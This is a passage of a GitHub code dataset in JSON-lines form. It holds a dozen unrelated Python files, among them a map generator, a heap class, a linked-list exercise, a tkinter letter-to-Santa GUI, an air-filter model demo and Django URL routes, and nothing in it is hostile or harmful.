my_bar.empty()\n st.write(\"--- %s minutes ---\" % ((time.time() - start_time)/60))\n with open(os.path.join(\"/tmp\", sql_file.name), \"w\") as f:\n f.write(sql_str)\n # sql_file.write(sql_str)\n # Download formatted CSV button\n download_file(sql_file)\n display_missing_df = df_report[df_report['Status']=='Counld not find']\n st.write(f'Report: {len(display_missing_df)} Could not find')\n st.dataframe(display_missing_df)\n st.write('Download Report:')\n download_excel(df_report)\n \n\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"TonyTanNguyen/fomatting_invoice","sub_path":"main_streamlit.py","file_name":"main_streamlit.py","file_ext":"py","file_size_in_byte":13825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11508292030","text":"from tarterus.maparray import MapArray # , MapSquare\nfrom random import randint\nimport json\nfrom tarterus.engine import Engine\nimport io\n\nLOG = \"\"\n\ndef get_log():\n global LOG\n return LOG\n\n\ndef clear_log():\n global LOG\n LOG = \"\"\n\n\ndef add_log(txt):\n global LOG\n LOG = LOG + \"\\n\" + txt\n\n\ndef pop_section(maparray, mapset):\n section = mapset.pop()\n if section[0] == 'room':\n add_room(maparray, section, mapset)\n elif section[0] == 'hall':\n add_hall(maparray, section, mapset)\n\n\ndef empty(maparray, x, y, w, h):\n if x + w - 1 >= maparray.w or y + h - 1 >= maparray.h or x < 0 or y < 0:\n return False\n return all(s == ('void', 0) for s in maparray.squares(x, y, w, h))\n\n# TODO ROOM NUMBERS\n# TODO CHECK ROOM INTERSECTION\ndef add_room(maparray, section, mapset):\n add_log(\"add_room: {} {} {} {}\".format(*section))\n w = randint(1, 4) * 4 + 2\n h = randint(1, 4) * 4 + 2\n add_log(\"w = {}, h = {}\".format(w, h))\n x = 0\n y = 0\n doors = [False, False, False, False]\n for i in range(len(doors)):\n if randint(1, 2) == 2:\n doors[i] = True\n if section[1] == 'n':\n doors[2] = False\n y = section[3] - h + 1\n x = randint(section[2] - 3 * w // 4, section[2] - 1 * w // 4)\n elif section[1] == 
'e':\n x = section[2]\n y = randint(section[3] - 3 * h // 4, section[3] - 1 * h // 4)\n doors[3] = False\n elif section[1] == 's':\n y = section[3]\n x = randint(section[2] - 3 * w // 4, section[2] - 1 * w // 4)\n doors[0] = False\n elif section[1] == 'w':\n x = section[2] - w + 1\n y = randint(section[3] - 3 * h // 4, section[3] - 1 * h // 4)\n doors[1] = False\n if not empty(maparray, x, y, w, h):\n return False\n maparray[x:x+w, y:y+h] = room(w, h, 0)\n add_log(\"room {}:{}, {}:{}\".format(x, x+w, y, y+h))\n maparray[section[2], section[3]] = ('door', 0)\n# TODO: NO DOORS IF HALL FAILS TO GENERATE (? WHERE TO PUT THAT CODE ?)\n if doors[0] is True:\n dx = randint(x + w // 4, x + 3 * w // 4)\n maparray[dx, y] = ('door', 0)\n mapset.add(('hall', 'n', dx, y - 1))\n if doors[1] is True:\n dy = randint(y + h // 4, y + 3 * h // 4)\n maparray[x + w - 1, dy] = ('door', 0)\n mapset.add(('hall', 'e', x + w, dy))\n if doors[2] is True:\n dx = randint(x + w // 4, x + 3 * w // 4)\n maparray[dx, y + h - 1] = ('door', 0)\n mapset.add(('hall', 's', dx, y + h))\n if doors[3] is True:\n dy = randint(y + h // 4, y + 3 * h // 4)\n maparray[x, dy] = ('door', 0)\n mapset.add(('hall', 'w', x - 1, dy))\n return False\n\n\n\ndef add_passage(maparray, section, mapset, r20_1, r20_2):\n pass\n\n\ndef add_hall(maparray, section, mapset):\n add_log(\"add_hall: {}, {}, {}, {}\".format(*section))\n l = randint(4,16)\n add_log(\"l = {}\".format(l))\n if section[1] == 'n':\n x = section[2]\n y = section[3]-l+1\n if not empty(maparray,x,y,1,l):\n return False\n maparray[x,y:y+l] = ('hall', 0)\n r = 1 # randint(1,8)\n if r == 7 and section[2] + 16 < maparray.w:\n mapset.add(('hall', 'e', section[2] + 1,\n randint(section[3] - 3 * l // 4, section[3] - l // 4)))\n elif r == 8 and section[2] > 16:\n mapset.add(('hall', 'w', section[2] - 1,\n randint(section[3] - 3 * l // 4, section[3] - l // 4)))\n mapset.add(('room', 'n', x, y - 1))\n elif section[1] == 'e':\n x = section[2]\n y = section[3]\n if not empty(maparray, x, y, l, 1):\n return False\n maparray[x:x+l,y] = ('hall', 0)\n r = 1 # randint(1,8)\n if r == 7 and section[3] + 16 < maparray.h:\n mapset.add(('hall', 's',\n randint(section[2] + l // 4, section[2] + 3 * l // 4), section[3] + l))\n elif r == 8 and section[3] > 16:\n mapset.add(('hall', 'n',\n randint(section[2] + l // 4, section[2] + 3 * l // 4),\n section[3]))\n mapset.add(('room', 'e', x+l, y))\n elif section[1] == 's':\n x = section[2]\n y = section[3]\n if not empty(maparray, x,y,1,l):\n return False\n maparray[x, y:y+l] = ('hall', 0)\n r = 1 # randint(1, 8)\n if r == 7 and section[2] + 16 < maparray.w:\n mapset.add(('hall', 'e', section[2] + 1,\n randint(section[3] + l // 4, section[3] + 3 * l // 4)))\n elif r == 8 and section[2] > 16:\n mapset.add(('hall', 'w', section[2] - 1,\n randint(section[3] + l // 4, section[3] + 3 * l // 4)))\n mapset.add(('room', 's', x, y+l))\n elif section[1] == 'w':\n x = section[2] - l + 1\n y = section[3]\n if not empty(maparray, x,y,l,1):\n return False\n maparray[x:x+l,y] = ('hall', 0)\n r = 1 # randint(1,8)\n if r == 7 and section[3] + 16 < maparray.h:\n mapset.add(('hall', 's',\n randint(section[2] - 3 * l // 4, section[2] - l // 4),\n section[3] + 1))\n elif r == 8 and section[3] > 16:\n mapset.add(('hall', 'n', \n randint(section[2] - 3 * l // 4, section[2] - l // 4), \n section[3] - 1))\n mapset.add(('room', 'w', x-1, y))\n return True\n\n\ndef room(w, h, rnum):\n mp = MapArray(('room', rnum), (w, h))\n mp[0:w:w-1, 1:h-1] = ('vwal', rnum)\n mp[1:w-1, 0:h:h-1] = 
('hwal', rnum)\n mp[0:w:w-1, 0] = ('tcor', rnum)\n mp[0:w:w-1, h-1] = ('bcor', rnum)\n return mp\n\n\ndef gen_map(w, h, typ=\"default\"):\n maparray = MapArray(('void', 0), (w, h))\n x = maparray.w // 2\n y = 0\n mapset = set()\n add_hall(maparray, ('hall', 's', x, y), mapset)\n while len(mapset) > 0:\n pop_section(maparray, mapset)\n return (maparray, [{}])\n\ndef big_room(w, h):\n ma = MapArray(('void', 0), (w, h))\n rlist = [{}]\n x = 3\n y = 3\n rw = w - 6\n rh = h - 6\n ma[x:x+rw, y:y+rh] = room(rw, rh, 1)\n rlist.append({\"description\": \"BIG ROOM DADDY-O\"})\n return ma, rlist\n\n\ndef gen_splash(w, h):\n ma = MapArray(('void', 0), (w, h))\n topW = ma.w // 4 * 2\n botW = ma.w // 7\n topH = ma.h // 9\n botH = ma.h // 9 * 5\n topX = ma.w // 4\n botX = ma.w // 7 * 3\n dorX = ma.w // 2 - 1\n topY = ma.h // 9 * 2\n botY = ma.h // 9 * 3 - 1\n topR = room(topW, topH, 1)\n botR = room(botW, botH, 1)\n ma[topX:topX+topW, topY:topY+topH] = topR\n ma[botX:botX+botW, botY:botY+botH] = botR\n ma[dorX, botY] = ('door', 1)\n rlist = [{}]\n rlist.append({\"description\": \"\"\"

Tarterus

\n

© Carter Adams 2018

\"\"\"})\n return ma, rlist\n\n\ndef add_feature(ma, rlist, features):\n f = features.pop()\n rn = len(rlist)\n if f['type'] == 'passage':\n ln = randint(4, 10)\n x = f['x']\n y = f['y']\n d = f['d']\n for _ in range(ln):\n ma[x, y] = ('hall', rn)\n if d == 'e':\n x = x + 1\n elif d == 'w':\n x = x - 1\n elif d == 'n':\n y = y - 1\n elif d == 's':\n y = y + 1\n\n\ndef hall_test(w, h):\n ma = MapArray(('void', 0), (w, h))\n rlist = [{}]\n features = set({'type': 'passage', 'x': 1, 'y': h // 2, 'd': 'e'})\n while len(features) > 0:\n add_feature(ma, rlist, features)\n return ma, rlist\n\n\ndef gen_hall(x, y, d, ma, rn):\n ma[x:x+10, y] = ('hall', rn)\n\n\ndef label_to_n(label):\n TILETABLE = {\n 'void': 0,\n 'vwal': 1,\n 'hwal': 2,\n 'room': 3,\n 'hall': 4,\n 'tcor': 5,\n 'bcor': 6,\n 'door': 7,\n 'sdwn': 8,\n 'stup': 9,\n 'errr': 10,\n 'open': 11\n }\n try:\n return TILETABLE[label]\n except(KeyError):\n return 9\n\n\ndef maparray_to_json(ma, rlist, log):\n mp = []\n mnums = []\n add_log(\"end log.\")\n for c in range(ma.w):\n mp.append([])\n mnums.append([])\n for r in range(ma.h):\n mp[c].append(label_to_n(ma[c, r][0]))\n mnums[c].append(ma[c, r][1])\n return {\n \"mp\": mp,\n \"rnums\": mnums,\n \"rlist\": rlist,\n \"log\": log\n }\n\n\ndef fetch_map(w, h, typ=\"default\"):\n maparray = None\n roomlist = None\n clear_log()\n if typ == \"hall_test\":\n e = Engine({\"w\": w, \"h\": h, \"pop_mode\": \"random\"})\n e.add([\"start\", {\"origin\": \"m\"}])\n e.gen_map()\n maparray = e.maparray\n e.process_descriptions()\n roomlist = e.descriptions\n if typ == \"binary_test\":\n e = Engine({\"w\": w, \"h\": h, \"pop_mode\": \"random\"})\n e.add([\"start\", {\"origin\": \"m\"}])\n e.gen_map()\n return io.BytesIO(e.maparray.bytes())\n\n\n if typ == \"splash\":\n maparray, roomlist = gen_splash(w, h)\n add_log(\"fetch_map\")\n return json.dumps(maparray_to_json(maparray, roomlist, get_log()))\n\n\nif __name__ == \"__main__\":\n print(\"run tests or some shit\")\n","repo_name":"redcartel/tarterus-webclient","sub_path":"tarterus/mapgen.py","file_name":"mapgen.py","file_ext":"py","file_size_in_byte":8993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17682971871","text":"list_1 = [2, 4, 8]\nlist_2 = [1, 3, 2]\n\ndef combine(l1, l2):\n new_list = []\n for i in range(len(l1)):\n new_list.append(l1[i]+l2[i])\n return new_list\n\n# print(combine(list_1, list_2))\n\n\n# answer = 5 * 8\n# user_answer = int(input(\"What is 5 x 8?\"))\n\n# print(isinstance(user_answer, (int, float)))\n\n# print(user_answer)\n\n# help(enumerate)\n\n\ndef filter_list(l):\n int_arr = []\n for i in l:\n if type(i) is int:\n int_arr.append(i)\n return int_arr\n\nnew_arr = [1,'a','b',0,15]\n# print(filter_list(new_arr))\n\n\ndef find_short(s):\n words = s.split(' ')\n words.sort(key=len)\n return len(words[0])\n\n# print(find_short(\"bitcoin take over the world maybe who knows perhaps\"))\n\n\ndef get_middle(s):\n sLen = len(s)\n if sLen % 2 == 0:\n return s[int(sLen/2-1): int(sLen/2+1)]\n else:\n return s[int(sLen/2)]\n\n\n# print(get_middle('testing'))\n\n\ndef remove_char(s):\n return s[1:-1]\n\nprint(remove_char('Hello'))\n","repo_name":"JuanTGit/practice","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26896918648","text":"#Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, 
next=None):\n        self.val = val\n        self.next = next\n\ndef list_to_linkedlist(nums):\n    dummy = ListNode(0)\n    ptr = dummy\n    for n in nums:\n        ptr.next = ListNode(n)\n        ptr = ptr.next\n    return dummy.next\n\ndef removeNthFromEnd(head: ListNode, n: int) -> ListNode:\n    dummy = ListNode(0, head)\n    left = dummy\n    right = head\n\n    while n > 0:\n        right = right.next\n        n -= 1\n\n    while right:\n        left = left.next\n        right = right.next\n\n    # delete\n    left.next = left.next.next\n    return dummy.next\n    \nnums = [1,2,3,4,5]\nn = 2\nlinked_list = list_to_linkedlist(nums)\n\nresult = removeNthFromEnd(linked_list, n)\n\ncurrent_node = result\nwhile current_node:\n    print(current_node.val)\n    current_node = current_node.next\n\n\"\"\"\nThis function removes the n-th node from the end of a singly linked list. It is a common linked-list problem, solved with the two-pointer technique.\n\n### Overview:\nThe function removes the n-th node from the end of the list in a single pass. First, define two pointers with a gap of n between them. Then move both pointers together; when the second pointer reaches the end of the list, the first pointer points at the node just before the one to delete. Finally, remove that node by skipping it and relinking to the following node.\n\n### Step-by-step:\n\n1. **Initial setup**:\n   ```python\n   dummy = ListNode(0, head)\n   left = dummy\n   right = head\n   ```\n   The `dummy` node holds the new head; it keeps the list intact even when the actual head node is the one being deleted.\n   `left` points at the `dummy` node, and `right` points at the actual head node.\n\n2. **Advance the `right` pointer n steps**:\n   ```python\n   while n > 0:\n       right = right.next\n       n -= 1\n   ```\n   This loop moves the `right` pointer forward by exactly `n` nodes.\n\n3. **Move both pointers together**:\n   ```python\n   while right:\n       left = left.next\n       right = right.next\n   ```\n   This loop moves the two pointers together until `right` reaches the end of the list. At that point, `left` points at the (n+1)-th node from the end.\n\n4. **Delete the node**:\n   ```python\n   left.next = left.next.next\n   ```\n   Here the node after the `left` pointer is the n-th node from the end, so it is skipped and the link is rewired to the following node.\n\n5. **Return the result**:\n   ```python\n   return dummy.next\n   ```\n   Finally, return the node after the `dummy` node (the actual head of the list).\n\"\"\"\n\n\"\"\"\nThis function removes the n-th node counted from the end of a linked list. Here we walk through it with the list `[1,2,3,4,5]` and n=2 as an example.\n\nRunning the simulation, processing proceeds through the following steps:\n\n1. **Initialization**:\n   - Create a dummy node for the list.\n   - The `left` pointer points at the dummy node.\n   - The `right` pointer points at the head of the list.\n\n   ```python\n   dummy = ListNode(0, head)\n   left = dummy\n   right = head\n   ```\n\n2. **Move the right pointer n steps ahead**:\n   - Advance the `right` pointer n steps, so the distance between `left` and `right` becomes n + 1.\n\n   ```python\n   while n > 0:\n       right = right.next\n       n -= 1\n   ```\n\n   In this example n=2, so `right` moves from `1` to `3`.\n\n3. **Move left and right together until right reaches the end of the list**:\n   - Advance `left` and `right` one step at a time until `right` reaches the end of the list.\n\n   ```python\n   while right:\n       left = left.next\n       right = right.next\n   ```\n\n   When this completes, `left` points at the node just before the one to delete.\n\n4. **Delete the node**:\n   - Update `left.next` to `left.next.next`, removing the n-th node from the list.\n\n   ```python\n   left.next = left.next.next\n   ```\n\n   In this example, node `4` is deleted and the list becomes `[1,2,3,5]`.\n\n
5. **Return the result**:\n   - Return the node after the dummy node, i.e. the head of the list.\n\n   ```python\n   return dummy.next\n   ```\n\n   In this example, the list `[1,2,3,5]` is returned.\n\"\"\"","repo_name":"majikojima/neetcode","sub_path":"06_LinkedList/05_RemoveNthNodeFromEndofList.py","file_name":"05_RemoveNthNodeFromEndofList.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5824741776","text":"import random\n#file_handle=open(\"1.txt\",mode=\"w\")\ndef create_left_node(left,right,edge,l_num,edge_temp1,file_handle,t):\n    ltemp=[l_num,abs(int(random.normalvariate(t,1.5)))] # set the lifetime\n    left.append(ltemp)\n    file_handle.writelines([str(ltemp[0]),\" \",str(ltemp[1]),\"\\n\"])\n    for rk in range(len(right)):\n        if(random.randint(2,6)>=3):\n            edge_temp=[l_num,right[rk][0],abs(random.normalvariate(1,1.3))]\n            edge.append(edge_temp)\n            edge_temp1.append(edge_temp)\n\ndef create_right_node(left,right,edge,r_num,edge_temp1,file_handle,t):\n    rtemp=[r_num,abs(int(random.normalvariate(t,1.5)))] # set the lifetime\n    right.append(rtemp)\n    file_handle.writelines([str(rtemp[0]),\" \",str(rtemp[1]),\"\\n\"])\n    for lk in range(len(left)):\n        if(random.randint(2,6)>=3):\n            edge_temp=[left[lk][0],r_num,abs(random.normalvariate(1,1.3))]\n            edge.append(edge_temp)\n            edge_temp1.append(edge_temp)\n","repo_name":"cwr1518/online","sub_path":"create_node.py","file_name":"create_node.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37689602144","text":"from __future__ import annotations\n\nimport inspect\n\nfrom flake8_scripts.six_remover import remove_six_from_text\n\nfrom .runtime_checker import run_code\n\n\ndef test_remove_u():\n    source = \"\"\"\n    import six\n\n    a = six.u(\"blabla\") # keep this comment\n    b = six.u(\"lablab\") # keep this comment too\n    c = a.encode() + b.encode()\n    print(a, b, c)\n    \"\"\"\n\n    expect = \"\"\"\n    import six\n\n    a = 'blabla' # keep this comment\n    b = 'lablab' # keep this comment too\n    c = a.encode() + b.encode()\n    print(a, b, c)\n    \"\"\"\n\n    source = inspect.cleandoc(source)\n    expect = inspect.cleandoc(expect)\n    actual = remove_six_from_text(source)\n\n    assert actual is not None\n    assert actual == expect\n    assert run_code(source) == run_code(expect)\n","repo_name":"cattidea/paddle-flake8-project","sub_path":"tests/test_six_remover/test_remove_u.py","file_name":"test_remove_u.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26725339619","text":"import arcade\nimport random\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\n\ndef draw_pine(x, y):\n    arcade.draw_triangle_filled(x + 40, y - 40, x, y - 100, x + 80, y - 100, arcade.color.DARK_GREEN)\n    arcade.draw_triangle_filled(x + 40, y, x, y - 60, x + 80, y - 60, arcade.color.DARK_GREEN)\n    arcade.draw_lrtb_rectangle_filled(x + 30, x + 50, y - 100, y - 140, arcade.color.DARK_BROWN)\n\n\ndef draw_house(x, y):\n    arcade.draw_triangle_filled(x + 50, y, x, y - 60, x + 100, y - 60, arcade.color.DARK_RED)\n    arcade.draw_lrtb_rectangle_filled(x + 10, x + 90, y - 60, y - 120, arcade.color.DARK_BLUE)\n\n\narcade.open_window(SCREEN_WIDTH, SCREEN_HEIGHT, \"School project\")\narcade.set_background_color(arcade.color.GREEN)\n\narcade.start_render()\n\nfor x in range(1, 19):\n    xx = random.randint(0, 700)\n    draw_house(xx, random.randint(120, 600));\n\nfor x in range(1, 19):\n    xx = random.randint(0, 720)\n    draw_pine(xx,
random.randint(140, 600));\n\narcade.finish_render()\narcade.run()\n\n\n\n","repo_name":"chervad/school_proj","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23473056989","text":"class heap:\n def __init__(self, array=None):\n self.heap = []\n\n def __repr__(self):\n return str(self.heap)\n\n def is_empty(self):\n return self.size() == 0\n\n def size(self):\n return len(self.heap)\n\n def heapify(self, array):\n #treba zkopirovat, ne priradit x jinak se zacykli\n self.heap = array.copy()\n for i in range((len(array) - 1) // 2, -1, -1):\n self.bubbledown(i, array [i])\n\n\n def bubbleup(self, index, value):\n while (index - 1) // 2 >= 0:\n parent = (index - 1) // 2\n if self.heap[parent] > self.heap[index]:\n self.heap[index] = self.heap[parent]\n self.heap[parent] = value\n index = parent\n else:\n break\n\n def bubbledown(self, index, value):\n while 2 * index + 1 < len(self.heap):\n keychild = 2 * index + 1\n if keychild + 1 < len(self.heap) and self.heap[keychild + 1] < self.heap[keychild]:\n keychild += 1\n\n if self.heap[keychild] < value:\n self.heap[index] = self.heap[keychild]\n self.heap[keychild] = value\n index = keychild\n else:\n break\n\n def pop(self):\n if self.is_empty():\n return None\n min = self.heap[0]\n self.heap[0] = self.heap[-1]\n value = self.heap.pop()\n index = 0\n self.bubbledown(index, value)\n return min\n\n def insert(self, value):\n index = len(self.heap)\n self.heap.append(value)\n self.bubbleup(index, value)\n\n def delete(self, index):\n if not self.is_empty() and index < self.size():\n value = self.heap[-1]\n self.heap[index] = value\n self.heap.pop()\n\n if (index - 1) // 2 >=0 and self.heap[(index - 1) // 2] > value:\n self.bubbleup(index, value)\n elif (2*index +1 < self.size() and self.heap [2*index+1] < value) or (2*index +2 < self.size() and self.heap [2*index+2] < value) :\n self.bubbledown(index, value)\n\n\n\n\n\n\n\na = [5,6,7,2,3,4,5]\nh = heap()\nh.heapify(a)\nprint(h)\n\n\nfor num in a:\n h.insert(num)\n print(h)\nh.delete(2)\nh.delete(5)\nprint (h)\nfor _ in range (len(a)+1):\n h.pop()\n print(h)\n\n\n","repo_name":"stefkalad/B3B33ALP","sub_path":"USEFULCODE/data_structures/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3645798738","text":"from tkinter import *\nfrom tkinter import messagebox\n\nclass Gui(Tk):\n\n # Window\n def __init__(self):\n super().__init__()\n\n # Resources\n self.santa_image = PhotoImage(file=\"/Users/seanypollard/Documents/Uni/Programming/com404/999-actual-tca/02-tca-ae2/santa.gif\")\n\n # Attributes\n self.title(\"Letter to Santa\")\n self.configure(background=\"#f66\",\n padx=15, pady=15,\n width=400)\n \n # Components\n self.__add_global_frame()\n self.__add_heading_label()\n self.__add_name_label()\n self.__add_name_entry()\n self.__add_santa_image_label()\n self.__add_letter_text()\n self.__add_post_button()\n\n # Global Frame\n def __add_global_frame(self):\n self.global_frame = Frame()\n self.global_frame.pack()\n self.global_frame.configure(background=\"#f33\",\n padx=5, pady=5)\n\n # Heading Label\n def __add_heading_label(self):\n self.heading_label = Label(self.global_frame)\n self.heading_label.grid(row=0, column=0, columnspan=2, padx=5)\n self.heading_label.configure(background=\"#f33\", foreground=\"#fff\",\n font=\"Arial 
18\", text=\"Write to Santa!\")\n\n # Name Label\n def __add_name_label(self):\n self.name_label = Label(self.global_frame)\n self.name_label.grid(row=1, column=0, pady=5)\n self.name_label.configure(background=\"#f33\", foreground=\"#fff\",\n font=\"Arial 12\", text=\"Your name:\")\n\n # Name Entry\n def __add_name_entry(self):\n self.name_entry = Entry(self.global_frame)\n self.name_entry.grid(row=1, column=1)\n\n # Santa Image Label\n def __add_santa_image_label(self):\n self.santa_image_label = Label(self.global_frame)\n self.santa_image_label.grid(row=2, column=0)\n self.santa_image_label.configure(background=\"#f33\",\n image=self.santa_image)\n \n # Letter Text\n def __add_letter_text(self):\n self.letter_text = Text(self.global_frame)\n self.letter_text.grid(row=2, column=1)\n self.letter_text.configure(width=30, height=5)\n\n # Post Button\n def __add_post_button(self):\n self.post_button = Button(self.global_frame)\n self.post_button.grid(row=3, column=0, columnspan=2)\n self.post_button.configure(background=\"#ff0\",\n text=\"Post Letter\")\n self.post_button.bind(\"\", self.__post_button_clicked)\n \n def __post_button_clicked(self, event):\n messagebox.showinfo(\"Sent!\", \"Your letter has been sent!\")\n\ngui = Gui() \ngui.mainloop() ","repo_name":"SeanyPollard/com404","sub_path":"999-actual-tca/02-tca-ae2/part_a.py","file_name":"part_a.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2134293118","text":"# Demo of Python air filter model\n\n# Import necessary packages ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nimport shutil\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Import our model ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Easiest if we have the module in this directory, so first the current version is copied in\n# We will probably come up with something more sophisticated eventually\nshutil.copy('../../tfmod.py', '.')\nfrom tfmod import tfmod\n\n# Set model inputs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# See notes in tfmod.py for more complete descriptions\nL = 2 # Filter length/depth (m)\npor_g = 0.5 # (m3/m3)\npor_l = 0.25 # (m3/m3)\nv_g = 0.03 # Air flow (m/s)\nv_l = 2E-5 # Water flow (m/s)\nnc = 30 # Number of model cells (layers)\ncg0 = 0 # (g/m3)\ncl0 = 0 # (g/m3)\ncgin = 1. # Dirty air compound concentration (g/m3)\nhenry = (0.1, 2000.)\ntemp = 15. # (degrees C)\ndens = 1000 # Liquid density (kg/m3)\n\nKga = 1. # Mass transfer coefficient (1/s)\nk = 10. 
/ 3600\n\npH = 7.\npKa = 7.\n\n\n# Times for model output, calculated from tt and nt here but could be set directly\n# Total duration (hours)\ntt = 2 \n# Number of time rows\nnt = 500\ntimes = np.linspace(0, tt, nt) * 3600\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n# Scenarios ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Sim 1 pH = pKa\npred1 = tfmod(L = L, por_g = por_g, por_l = por_l, v_g = v_g, v_l = v_l, nc = nc, cg0 = cg0, \n cl0 = cl0, cgin = cgin, Kga = Kga, k = k, henry = henry, pKa = pKa, \n pH = pH, temp = temp, dens = dens, times = times)\n\n# Sim 2 low pH ~~~~~~~~~~~~~~~~~\npH = 5\npred2 = tfmod(L = L, por_g = por_g, por_l = por_l, v_g = v_g, v_l = v_l, nc = nc, cg0 = cg0, \n cl0 = cl0, cgin = cgin, Kga = Kga, k = k, henry = henry, pKa = pKa, \n pH = pH, temp = temp, dens = dens, times = times)\n\n# Sim 3 high pH ~~~~~~~~~~~~~~~~\npH = 9\npred3 = tfmod(L = L, por_g = por_g, por_l = por_l, v_g = v_g, v_l = v_l, nc = nc, cg0 = cg0, \n cl0 = cl0, cgin = cgin, Kga = Kga, k = k, henry = henry, pKa = pKa, \n pH = pH, temp = temp, dens = dens, times = times)\n\n# Plots ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Plot outlet concentration (= 1 - removal efficiency here because cgin = 1)\n# Gas concentration (outlet air) \nplt.plot(pred1[5] / 3600, pred1[0][nc - 1, :], 'r-')\nplt.plot(pred2[5] / 3600, pred2[0][nc - 1, :], 'b', linestyle = 'dashed')\nplt.plot(pred3[5] / 3600, pred3[0][nc - 1, :], 'g-')\nplt.xlabel('Time (h)')\nplt.ylabel('Compound conc. (g/m3)')\nplt.savefig('outlet_gas_conc.png')\n\n# Liquid concentration (in last layer)\nplt.clf()\nplt.plot(pred1[5] / 3600, pred1[1][nc - 1, :], 'r-')\nplt.plot(pred2[5] / 3600, pred2[1][nc - 1, :], 'b', linestyle = 'dashed')\nplt.plot(pred3[5] / 3600, pred3[1][nc - 1, :], 'g-')\nplt.xlabel('Time (h)')\nplt.ylabel('Compound conc. (g/m3)')\nplt.savefig('outlet_liq_conc.png')\n\n# Profiles\n# Gas\nplt.clf()\nplt.plot(pred1[4], pred1[0][:, nt - 1], 'r-')\nplt.plot(pred2[4], pred2[0][:, nt - 1], 'b', linestyle = 'dashed')\nplt.plot(pred3[4], pred3[0][:, nt - 1], 'g-')\nplt.xlabel('Location (m)')\nplt.ylabel('Compound conc. (g/m3)')\nplt.savefig('profile_gas_conc.png')\n\n# Liquid\nplt.clf()\nplt.plot(pred1[4], pred1[1][:, nt - 1], 'r-')\nplt.plot(pred2[4], pred2[1][:, nt - 1], 'b', linestyle = 'dashed')\nplt.plot(pred3[4], pred3[1][:, nt - 1], 'g-')\nplt.xlabel('Location (m)')\nplt.ylabel('Compound conc. 
(g/m3)')\nplt.savefig('profile_liq_conc.png')\n","repo_name":"AU-BCE-EE/tric-fil-mod","sub_path":"demos/04_ionization/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33558262379","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom .views import PeliculaViewSet, SummaryView, SummaryView2, PeliculaGeoJSONView\n\n# Router para el servicio de peliculas\nrouter = DefaultRouter()\nrouter.register(r'movies', PeliculaViewSet)\n\n# Rutas para el servicio de peliculas\nurlpatterns = [\n path('', include(router.urls)),\n path('summary/', SummaryView.as_view()), # Servicio de resumen de peliculas según los requerimientos\n path('summary02/', SummaryView2.as_view()), # Servicio de resumen de peliculas adicional\n path('geojson/', PeliculaGeoJSONView.as_view(), name='location_geojson_list'), # Servicio geolocalización de\n # peliculas\n]\n","repo_name":"ivan-andres-vargas/ACC_Prueba_Backend","sub_path":"APP_Prueba_Backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1651992258","text":"\"\"\"\nBase class for AHRS view elements.\n\"\"\"\n\nfrom data_sources.ahrs_data import AhrsData\nfrom common_utils import tasks, units\nfrom configuration import configuration\nfrom rendering import colors, display, text_renderer\n\n\ndef __get_default_text_background_color__() -> list:\n return colors.BLACK if display.IS_OPENGL else None\n\n\nclass HudElement(object):\n def __init__(\n self,\n font,\n framebuffer_size: list,\n reduced_visuals: bool = False\n ) -> None:\n super().__init__()\n\n border_margin = 0.01\n\n self.__font__ = font\n\n self.__framebuffer_size__ = framebuffer_size\n self.__center__ = (framebuffer_size[0] >> 1, framebuffer_size[1] >> 1)\n\n self.__width__ = framebuffer_size[0]\n self.__height__ = framebuffer_size[1]\n\n self.__right_border__ = int((1.0 - border_margin) * framebuffer_size[0])\n self.__left_border__ = int(framebuffer_size[0] * border_margin)\n\n self.__top_border__ = int(self.__height__ * border_margin)\n self.__bottom_border__ = self.__height__ - self.__top_border__\n\n self.__center_x__ = framebuffer_size[0] >> 1\n self.__center_y__ = framebuffer_size[1] >> 1\n\n self.__font_height__ = int(font.get_height())\n self.__font_half_height__ = int(self.__font_height__ >> 1)\n\n self.__line_width__ = max(1, int((self.__width__ * 0.005) + 0.5))\n 